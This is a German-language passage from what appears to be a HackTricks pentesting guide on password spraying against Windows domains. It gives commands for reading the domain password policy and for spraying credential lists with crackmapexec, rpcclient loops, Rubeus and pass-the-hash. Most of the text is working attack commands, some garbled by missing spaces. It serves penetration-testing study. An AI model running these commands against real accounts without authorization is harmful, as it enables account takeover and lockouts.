Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an dieHackTricks und HackTricks Cloud Github-Repositories einreichen.
Passwort-Spraying
Sobald Sie mehrere gültige Benutzernamen gefunden haben, können Sie die häufigsten Passwörter ausprobieren (beachten Sie die Passwortrichtlinie der Umgebung) für jeden der entdeckten Benutzer.
Standardmäßig beträgt die minimale Passwortlänge7.
Beachten Sie, dass Sie einige Konten sperren könnten, wenn Sie mehrere falsche Passwörter ausprobieren (standardmäßig mehr als 10).
Passwortrichtlinie abrufen
Wenn Sie einige Benutzeranmeldeinformationen haben oder eine Shell als Domänenbenutzer haben, können Sie die Passwortrichtlinie mit abrufen:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Ausnutzung von Linux (oder allen)
Mit crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
Mit dem Modul scanner/smb/smb_login von Metasploit:
Verwendung von rpcclient:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Mit Invoke-DomainPasswordSpray (Es kann standardmäßig Benutzer aus der Domäne generieren und die Kennwortrichtlinie aus der Domäne abrufen und die Versuche entsprechend einschränken):